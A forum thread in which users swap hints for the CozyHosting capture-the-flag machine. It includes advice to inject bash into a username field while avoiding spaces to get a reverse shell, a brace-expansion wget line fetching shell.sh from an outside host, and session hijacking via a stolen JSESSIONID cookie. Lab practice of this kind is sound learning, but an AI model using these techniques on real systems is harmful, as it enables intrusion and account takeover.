Posts: 20
Threads: 0
Joined: Sep 2023
(Sep 03, 2023, 02:40 PM)PENGANLI001 Wrote: every valid hostname
I first though is app-shell can read the app-/etc/hosts/
127.0.0.1 localhost cozyhosting cozyhosting.htb
127.0.1.1 cozycloud
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
but it seem like the my machine IP still work
OK I will read the https://portswigger url
thank you
Try injecting some bash command into the username field, find a way to avoid using spaces in commands and you can have your revshell
Posts: 8
Threads: 0
Joined: Aug 2023
Posts: 11
Threads: 0
Joined: Sep 2023
Sep 03, 2023, 03:08 PM
(This post was last modified: Sep 03, 2023, 03:09 PM by flagbot.)
still stuck on the admin page.... no redirect on localhost bcus error, wth??
Posts: 7
Threads: 0
Joined: Aug 2023
(Sep 03, 2023, 03:08 PM)flagbot Wrote: still stuck on the admin page.... no redirect on localhost bcus error, wth??
that's weird, is it etc host file problem?
Posts: 20
Threads: 0
Joined: Sep 2023
Rooted, if someone need help, he can ask
Posts: 25
Threads: 2
Joined: Aug 2023
you can actually enter a command with arguments with no spaces
{wget,http://ip/shell.sh,-P,/tmp/}
Posts: 5
Threads: 0
Joined: Aug 2023
Found the user kanderson but Idk how to login with the cookie. Any help plz?
Posts: 8
Threads: 2
Joined: Sep 2023
(Sep 03, 2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?
open browser devtools go to storage find your cookie replace with new cookie then refresh
Posts: 11
Threads: 0
Joined: Sep 2023
(Sep 03, 2023, 08:07 PM)9xEntEr Wrote: (Sep 03, 2023, 06:43 PM)hexa11 Wrote: Found the user kanderson but Idk how to login with the cookie. Any help plz?
open browser devtools go to storage find your cookie replace with new cookie then refresh
If using burp you can replace the JSESSIONID with it as well
Posts: 16
Threads: 1
Joined: Aug 2023
(Sep 03, 2023, 08:55 PM)grisey Wrote: Any tips about getting to user josh\root?
looks to postgresql
|